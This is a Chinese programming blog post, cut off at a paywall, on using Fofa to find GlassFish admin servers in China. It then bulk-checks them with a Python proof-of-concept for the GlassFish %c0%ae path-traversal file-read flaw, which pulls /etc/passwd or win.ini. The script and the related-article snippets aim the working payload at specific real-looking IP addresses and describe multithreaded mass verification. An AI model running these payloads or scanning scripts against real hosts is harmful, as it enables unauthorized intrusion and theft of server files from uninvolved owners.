Python开发-批量Fofa&POC验证

最新推荐文章于 2023-02-09 12:41:10 发布
最新推荐文章于 2023-02-09 12:41:10 发布
阅读量1.2k 收藏 6
点赞数 1
分类专栏: web安全 python爬虫 文章标签: python 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45357474/article/details/114292033
版权

Python开发-批量Fofa&POC验证


学习目的:掌握利用公开或0day漏洞进行批量化的收集及验证脚本开发

首先有一个基本的漏洞是应用服务器glassfish任意文件读取漏洞在这里插入图片描述
该漏洞标题写的是任意文件读取漏洞,其实该漏洞同样可以列出对应目录文件,基本上等同于源代码泄露,各种敏感信息暴露无遗。

Linux服务器会读取etc/passwd文件的内容

windows服务器会读取windows/win.ini文件的内容

4848端口为glassfish默认开放的web管理端口

首先去fofa搜索一波

“glassfish”&&port=“4848” && after=“2021-01-01” && country=“CN”
在这里插入图片描述
目的就是把这些ip地址爬下来然后用poc验证

首先写一个简易的poc验证代码

#encoding:utf-8
import requests

url='http://112.126.97.184:4848/'
payload_linux='/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd'
payload_windows='/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/windows/win.ini'

data_linux= requests.get(url+payload_linux)  #获取请求后的返回源代码
data_windows=requests.get(url+payload_windows)

data_linux=requests.get(url+payload_linux).status_code  #获取请求后的返回状态码
data_windows=requests.get(url+payload_windows).status_code

if data_linux==200 or data_windows==200:
    print("存在漏洞"
最低0.47元/天 解锁文章
菠萝吹雪cc
关注
  • 1
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 4
    评论
专栏目录
POC批量验证Python脚本编写
hackzkaq的博客
05-06 3728
更多黑客技能 公众号:白帽子左一 作者:掌控安全- webdogc 编写目的 批量验证pocPython代码练习。 需求分析 1、poc尽可能简单。 2、多线程。 3、联动fofa获取目标。 4、随机请求头. 实现过程 脚本分为三个模块,获取poc及目标、多线程批量请求验证、输出结果。其批量请求验证包括构造多线程,修改请求参数,发送请求三个部分。 Main函数 在main函数,主要有三个部分获取poc及目标,多线程(将目标填充到队列,创建多线程并启动)、输出结果。 具体实现如下: def mai
第77天-Python 开发-批量 Fofa&SRC 提取&POC 验证
MCTSOG的博客
04-30 788
思维导图 本课知识点: Request 爬虫技术,lxml 数据提取,异常护理,Fofa 等使用说明 学习目的: 掌握利用公开或 0day 漏洞进行批量化的收集及验证脚本开发 演示案例: Python 开发-某漏洞 POC 验证批量脚本 应用服务器glassfish任意文件读取漏洞 glassfish验证脚本 import requests import urllib3 urllib3.disable_warnings() # import ssl # ssl._create_default_htt
python3 多线程批量验证POC模板
weixin_30341745的博客
09-10 455
#coding:utf-8 import threading,Queue,sys,os class RedisUN(threading.Thread): def __init__(self,queue): threading.Thread.__init__(self) self._queue = queue def run(...
python开发-批量Fofa&POC验证&SRC提取
klcyl_0106的博客
05-12 802
Python开发-glassfish任意文件读取漏洞POC验证脚本 import requests url=”http://217.27.153.138:4848/” payload_linux = "/theme/METAINF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd
使用Python开发POC多线程批量执行小框架
weixin_30889885的博客
06-29 238
因为代码量非常少,所以就叫“小框架”吧。 接口非常简陋,但是好处是适配POC脚本的时候很灵活,兼容性高,不需要任何研究成本。 简单来说,你按照自己的想法和习惯开发一个POC验证程序,它只要做到三点,即: 1. 接收一个目标地址字符串作为输入参数。 2. 定义一个名称为 "exploit" 的函数供小框架来调用。 3. 当验证成功时返回一个自定义的字符串作为标志。 就完全可以满足使用小框...
Fofa-gui fofa快速采集工具
01-19
【标题】"Fofa-gui fofa快速采集工具"是针对网络安全研究和学习的专业工具,主要用于数据抓取和信息收集。Fofa-gui是该工具的图形化界面版本,使得用户能够更加直观、便捷地操作fofa的搜索功能。 【描述】"仅供学习...
fofa-tool FOFA api查询工具复活版
11-22
1、支持批量fofa语法查询,线程池支持,速度更快 2、自动分页,每页500条,最大10000条(根据Fofa的会员等级会有所不同) 3、支持导出scv文件 说明:fofa_tool 官网更新了域名,导致原有的工具失效。重新修改了...
python爬虫-电商数据
最新发布
10-23
包含:淘宝商品、微信公众号、大众点评、招聘网站、闲鱼、阿里任务、scrapy博客园、微博、百度贴吧、豆瓣电影、包图网、全景网、豆瓣音乐、某省药监局、搜狐新闻、机器学习文本采集、fofa资产采集、汽车之家、国家...
Fofa-collect:Fofa平台采集工具
05-01
Fofa-collectV3.0支持jdk8...javafx.web" -jar "xxx.jar"因为接口问题,删除ip查询功能增加Fofa采集进度条公开工具源码V2.0增加修改账号配置文件增加ip批量查询定位V1.0提供接口查询资产最大支持1000页查询解决页面卡死
Fofa-collect:Fofa采集工具
04-03
Fofa-collect:Fofa采集工具】是一款由个人开发者设计的用于Fofa搜索引擎数据采集的实用工具。Fofa是网络安全领域的一款知名搜索引擎,它允许用户通过指定的查询条件来查找互联网上的特定网络资源,如域名、IP、...
python函数登录验证_Python实现登陆文件验证方法
weixin_39611937的博客
12-11 837
代码主要功能:利用Python实现简单的登陆验证,代码主要有两个部分组成:第一部分:登陆页面,作用是实现用户名和密码的输入利用两个输入函数input()来实现对用户名和密码的输入第二部分:文件验证,作用是对输入的信息进行验证1.用户名的验证,首先对存储用户名和密码的信息读取,然后再把输入的用户名和从文件读取的用户名进行比对,如果比对成功则进行下一步的密码验证,如果没有实现则提示重新输入密码,对密...
Python开发-fofa批量挖掘glassfish-任意读取漏洞 (建议收藏学习!!!)
告白的博客
10-17 859
0x00 glassfish漏洞描述 漏洞分析: glassfish是一款java编写的跨平台的开源的应用服务器。 与宽字节SQL注入一致,都是由于unicode编码歧义导致的。具体payload如下构造: https://your-ip:4848/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%a
Python分布式工具开发(二)--指纹识别与POC验证
weixin_42282189的博客
10-08 693
作者: Beard_lin 免责声明:本文仅供学习研究,严禁从事非法活动,任何后果由使用者本人负责。 0x01 指纹与poc在分布式的架构问题 因为加入工具后的合理问题,所以在控制节点与执行节点都要进行一些更改。 控制节点: 1.载入数据 2.数据分配 执行节点: 1.载入指纹识别代码 2.载入poc验证代码 3.载入数据存储代码 0x02 指纹识别的相关问题 对于web指纹的匹配大致有如下位置: 1.title 2.body 3.http头 4.相关目录 前三项发送的请求数据较小,在大批量数据.
Python用户登录(验证账号密码)
qq_40753021的博客
02-09 925
【代码】Python用户登录(验证账号密码)
Python读取文件账号密码信息批量登录网址
闪落世间的专栏
01-14 2473
# -*- coding: utf-8 -*- import time import sys import os from selenium.webdriver import ActionChains from selenium import webdriver from selenium.webdriver.common.keys import Keys from selenium.webdriver.common.action_chains import ActionChains from selen.
Hotels账号批量验证Python
zxingdream的专栏
05-22 260
鄙人不才,刚学python不久,应一个朋友的需求,帮他写l一个账号批量效验器,初出江湖,勿喷哈。 首先展示先软件的运行界面: 为了防止同一个IP请求次数过多而且导致出现验证码,所以做了一个连续验证失败一定数量或者验证成功一个账号之后就重新拨号的功能, 拨号的具体过程就不发了 比较简单的cmd命令,实际上就是断开VPN 然后重连VPN的操作 好了,接下来贴出核心的验证代码: 这一步是为了初始化requests,设置主机头信息,这里我的user_agent没有太多,就随机设置了几个,这..
python安全开发——Fofa结果、POC批量提取验证&教育SRC
qi_SJQ_的博客
02-23 2671
1.概述: 涉及技术 :Request 爬虫技术,lxml 数据提取,异常护理,Fofa 等使用说明。 目的: 掌握和利用公开或者 0day漏洞进行批量化的收集和验证脚本开发。 2.某漏洞 POC 验证脚本: requests库使用参考:https://docs.python-requests.org/en/latest/ 首先拿一个简单的例子:验证是否存在 glassfish 任意文件读取漏洞。 过程:验证存在 glassfish 的应用是否存在任意文件读取漏洞 :两个 poc,分别对应 linu.
Python安全工具编写-网络空间搜索引擎收集信息
beirry的博客
12-06 1357
其实在fofa搜索页面已经给了脚本的编写规则和方法,都在API 我们Python安全工具编写脚本主要是通过调用FOFA的API来收集信息,这个是帮助文档:https://fofa.so/static_pages/api_help 通过帮助文档我们可以确定这个脚本需要哪些东西 1,输入查询内容 2,将查询内容经过base64编码 3,将返回内容输出成json格式 4,筛选想要的内容 5,输出内容 那么这上面就是我们编写脚本的一个基本框架 import requests import base64 impo
python编写一个FOFA
04-03
作为AI语言模型,我不会参与开发有关网络攻击或其他违法活动的工具或程序,请合理使用技术。以下是Python编写的FOFA代码: ```python import requests import json class FOFA(object): def __init__(self, email...
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值